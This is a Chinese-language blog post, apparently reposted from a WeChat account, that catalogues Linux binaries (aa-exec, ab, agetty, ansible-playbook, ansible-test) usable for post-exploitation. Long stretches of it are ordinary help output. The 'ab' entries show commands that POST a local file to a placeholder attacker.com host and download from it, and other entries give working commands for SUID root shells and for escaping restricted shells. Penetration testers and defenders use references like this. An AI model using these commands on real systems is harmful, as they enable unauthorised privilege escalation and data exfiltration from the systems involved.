linux提权工具
unix的很多二进制文件都可用于绕过配置错误的系统中的本地安全限制,合理利用这些功能,可以突破受限制的shell、升级或维持提升的权限、传输文件、生成绑定和反向shell,以及其他利用后任务。
aa-exec
aa-exec是一个用于执行AppArmor profiles的工具,AppArmor是一个Linux安全模块,用于控制程序对文件系统的访问权限,限制程序能够执行的操作,以增强系统的安全性。用法如下:
$ aa-exec
USAGE: aa-exec [OPTIONS] <prog> <args>
Confine <prog> with the specified PROFILE.
OPTIONS:
-p PROFILE, --profile=PROFILE PROFILE to confine <prog> with
-n NAMESPACE, --namespace=NAMESPACE NAMESPACE to confine <prog> in
-d, --debug show messages with debugging information
-i, --immediate change profile immediately instead of at exec
-v, --verbose show messages with stats
-h, --help display this help
shell
可用于生成交互式系统shell来突破受限环境。
┌──(kali㉿kali)-[~]
└─$ aa-exec /bin/sh
$ whoami
kali
SUID
如果二进制文件设置SUID,则可用于提升权限,可能会被用来访问系统文件、升级或维持作为SUID后门的特权访问。
sudo install -m =xs $(which aa-exec) .
$ ./aa-exec /bin/sh -p
# whoami
root
ab
'ab'是一个常用的命令行工具,通常被称为Apache压力测试工具(ApacheBench)。用于测试Apache HTTP服务器的性能,向服务器发送大量请求以测量服务器的吞吐量和性能指标。
$ ab
ab: wrong number of arguments
Usage: ab [options] [http展开收缩://]hostname[:port]/path
Options are:
-n requests Number of requests to perform
-c concurrency Number of multiple requests to make at a time
-t timelimit Seconds to max. to spend on benchmarking
This implies -n 50000
-s timeout Seconds to max. wait for each response
Default is 30 seconds
-b windowsize Size of TCP send/receive buffer, in bytes
-B address Address to bind to when making outgoing connections
-p postfile File containing data to POST. Remember also to set -T
-u putfile File containing data to PUT. Remember also to set -T
-T content-type Content-type header to use for POST/PUT data, eg.
'application/x-www-form-urlencoded'
Default is 'text/plain'
-v verbosity How much troubleshooting info to print
-w Print out results in HTML tables
-i Use HEAD instead of GET
-x attributes String to insert as table attributes
-y attributes String to insert as tr attributes
-z attributes String to insert as td or th attributes
-C attribute Add cookie, eg. 'Apache=1234'. (repeatable)
-H attribute Add Arbitrary header line, eg. 'Accept-Encoding: gzip'
Inserted after all normal header lines. (repeatable)
-A attribute Add Basic WWW Authentication, the attributes
are a colon separated username and password.
-P attribute Add Basic Proxy Authentication, the attributes
are a colon separated username and password.
-X proxy:port Proxyserver and port number to use
-V Print version number and exit
-k Use HTTP KeepAlive feature
-d Do not show percentiles served table.
-S Do not show confidence estimators and warnings.
-q Do not show progress when doing more than 150 requests
-l Accept variable document length (use this for dynamic pages)
-g filename Output collected data to gnuplot format file.
-e filename Output CSV file with percentages served
-r Don't exit on socket receive errors.
-m method Method name
-h Display usage information (this message)
-I Disable TLS Server Name Indication (SNI) extension
-Z ciphersuite Specify SSL/TLS cipher suite (See openssl ciphers)
-f protocol Specify SSL/TLS protocol
(SSL2, TLS1, TLS1.1, TLS1.2, TLS1.3 or ALL)
-E certfile Specify optional client certificate chain and private key
上传文件
可以通过HTTP POST请求上传本地文件
URL=http://attacker.com/
LFILE=file_to_send
ab -p $LFILE $URL
文件下载
可以通过HTTP GET请求获取远程文件。响应作为程序详细输出的一部分返回,但对长度有限制。
URL=http://attacker.com/file_to_download
ab -v2 $URL
SUID
sudo install -m =xs $(which ab) .
URL=http://attacker.com/
LFILE=file_to_send
./ab -p $LFILE $URL
sudo
URL=http://attacker.com/
LFILE=file_to_send
sudo ab -p $LFILE $URL
agetty
agetty是linux系统中用于管理文本终端的程序之一。它是getty(‘get tty’的缩写)程序的变体之一,用于在终端设备上启动登录会话。
agetty的作用是监听系统的终端设备(如:串口、控制台等),并在用户请求登录时提供登录提示。允许用户在文本界面上输入用户名和密码以登录系统。一旦用户成功登录,agetty就会将控制权交给一个终端管理器(例如“login”程序),进而启动用户的交互式会话。
在linux
系统中,agetty通常用于以下情况:
1、串口设备:用于在串口终端(例如通过串口连接的设备)上提供登录界面。
2、控制台:在本地控制台(物理终端)上启动登录会话,例如通过键盘和显示器。
SUID
sudo install -m =xs $(which agetty) .
./agetty -o -p -l /bin/sh -a root tty
ansible-playbook
ansible-playbook是Ansible工具的一部分,用于运行Ansible-Playbook。Ansible-Playbook是一个描述配置、部署和自动化任务的文本文件,其中包含一系列指令(任务),可以用来配置和管理远程计算机系统。ansible-playbook命令用于执行这些Playbook文件,用法如下:
ansible-playbook
usage: ansible-playbook [-h] [--version] [-v] [--private-key PRIVATE_KEY_FILE] [-u REMOTE_USER] [-c CONNECTION] [-T TIMEOUT]
[--ssh-common-args SSH_COMMON_ARGS] [--sftp-extra-args SFTP_EXTRA_ARGS] [--scp-extra-args SCP_EXTRA_ARGS]
[--ssh-extra-args SSH_EXTRA_ARGS] [-k | --connection-password-file CONNECTION_PASSWORD_FILE] [--force-handlers] [--flush-cache]
[-b] [--become-method BECOME_METHOD] [--become-user BECOME_USER] [-K | --become-password-file BECOME_PASSWORD_FILE] [-t TAGS]
[--skip-tags SKIP_TAGS] [-C] [-D] [-i INVENTORY] [--list-hosts] [-l SUBSET] [-e EXTRA_VARS] [--vault-id VAULT_IDS]
[--ask-vault-password | --vault-password-file VAULT_PASSWORD_FILES] [-f FORKS] [-M MODULE_PATH] [--syntax-check] [--list-tasks]
[--list-tags] [--step] [--start-at-task START_AT_TASK]
playbook [playbook ...]
ansible-playbook: error: the following arguments are required: playbook
usage: ansible-playbook [-h] [--version] [-v] [--private-key PRIVATE_KEY_FILE] [-u REMOTE_USER] [-c CONNECTION] [-T TIMEOUT]
[--ssh-common-args SSH_COMMON_ARGS] [--sftp-extra-args SFTP_EXTRA_ARGS] [--scp-extra-args SCP_EXTRA_ARGS]
[--ssh-extra-args SSH_EXTRA_ARGS] [-k | --connection-password-file CONNECTION_PASSWORD_FILE] [--force-handlers] [--flush-cache]
[-b] [--become-method BECOME_METHOD] [--become-user BECOME_USER] [-K | --become-password-file BECOME_PASSWORD_FILE] [-t TAGS]
[--skip-tags SKIP_TAGS] [-C] [-D] [-i INVENTORY] [--list-hosts] [-l SUBSET] [-e EXTRA_VARS] [--vault-id VAULT_IDS]
[--ask-vault-password | --vault-password-file VAULT_PASSWORD_FILES] [-f FORKS] [-M MODULE_PATH] [--syntax-check] [--list-tasks]
[--list-tags] [--step] [--start-at-task START_AT_TASK]
playbook [playbook ...]
Runs Ansible playbooks, executing the defined tasks on the targeted hosts.
positional arguments:
playbook Playbook(s)
options:
--ask-vault-password, --ask-vault-pass
ask for vault password
--become-password-file BECOME_PASSWORD_FILE, --become-pass-file BECOME_PASSWORD_FILE
Become password file
--connection-password-file CONNECTION_PASSWORD_FILE, --conn-pass-file CONNECTION_PASSWORD_FILE
Connection password file
--flush-cache clear the fact cache for every host in inventory
--force-handlers run handlers even if a task fails
--list-hosts outputs a list of matching hosts; does not execute anything else
--list-tags list all available tags
--list-tasks list all tasks that would be executed
--skip-tags SKIP_TAGS
only run plays and tasks whose tags do not match these values
--start-at-task START_AT_TASK
start the playbook at the task matching this name
--step one-step-at-a-time: confirm each task before running
--syntax-check perform a syntax check on the playbook, but do not execute it
--vault-id VAULT_IDS the vault identity to use
--vault-password-file VAULT_PASSWORD_FILES, --vault-pass-file VAULT_PASSWORD_FILES
vault password file
--version show program's version number, config file location, configured module search path, module location, executable location and exit
-C, --check don't make any changes; instead, try to predict some of the changes that may occur
-D, --diff when changing (small) files and templates, show the differences in those files; works great with --check
-K, --ask-become-pass
ask for privilege escalation password
-M MODULE_PATH, --module-path MODULE_PATH
prepend colon-separated path(s) to module library (default={{ ANSIBLE_HOME ~
"/plugins/modules:/usr/share/ansible/plugins/modules" }})
-e EXTRA_VARS, --extra-vars EXTRA_VARS
set additional variables as key=value or YAML/JSON, if filename prepend with @
-f FORKS, --forks FORKS
specify number of parallel processes to use (default=5)
-h, --help show this help message and exit
-i INVENTORY, --inventory INVENTORY, --inventory-file INVENTORY
specify inventory host path or comma separated host list. --inventory-file is deprecated
-k, --ask-pass ask for connection password
-l SUBSET, --limit SUBSET
further limit selected hosts to an additional pattern
-t TAGS, --tags TAGS only run plays and tasks tagged with these values
-v, --verbose Causes Ansible to print more debug messages. Adding multiple -v will increase the verbosity, the builtin plugins currently
evaluate up to -vvvvvv. A reasonable level to start is -vvv, connection debugging might require -vvvv.
Connection Options:
control as whom and how to connect to hosts
--private-key PRIVATE_KEY_FILE, --key-file PRIVATE_KEY_FILE
use this file to authenticate the connection
--scp-extra-args SCP_EXTRA_ARGS
specify extra arguments to pass to scp only (e.g. -l)
--sftp-extra-args SFTP_EXTRA_ARGS
specify extra arguments to pass to sftp only (e.g. -f, -l)
--ssh-common-args SSH_COMMON_ARGS
specify common arguments to pass to sftp/scp/ssh (e.g. ProxyCommand)
--ssh-extra-args SSH_EXTRA_ARGS
specify extra arguments to pass to ssh only (e.g. -R)
-T TIMEOUT, --timeout TIMEOUT
override the connection timeout in seconds (default=10)
-c CONNECTION, --connection CONNECTION
connection type to use (default=smart)
-u REMOTE_USER, --user REMOTE_USER
connect as this user (default=None)
Privilege Escalation Options:
control how and which user you become as on target hosts
--become-method BECOME_METHOD
privilege escalation method to use (default=sudo), use `ansible-doc -t become -l` to list valid choices.
--become-user BECOME_USER
run operations as this user (default=root)
-b, --become run operations with become (does not imply password prompting)
example:ansible-playbook playbook.yml
playbook.yml是想要执行的Ansible-playbook文件,Playbook文件通常使用YAML格式编写,其中定义了一系列任务、主机的分组以及需要执行的操作。
Ansible-playbook可以执行各种操作,比如安装软件、配置系统设置、部署应用程序等。它允许描述系统的期望状态,然后让Ansible自动化地将远程系统带到这个状态。
shell
TF=$(mktemp)
echo '[{hosts: localhost, tasks: [shell: /bin/sh </dev/tty >/dev/tty 2>/dev/tty]}]' >$TF
ansible-playbook $TF
ansible-test
ansible-test是Ansible提供的命令行工具,用于执行Ansible的测试套件,能够对Ansible模块、插件以及其他功能进行测试。用法如下:
ansible-test
usage: ansible-test [-h] [--version] COMMAND ...
ansible-test: error: the following arguments are required: COMMAND
shell
ansible-test shell原文始发于微信公众号(安全小白):linux提权工具(一)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论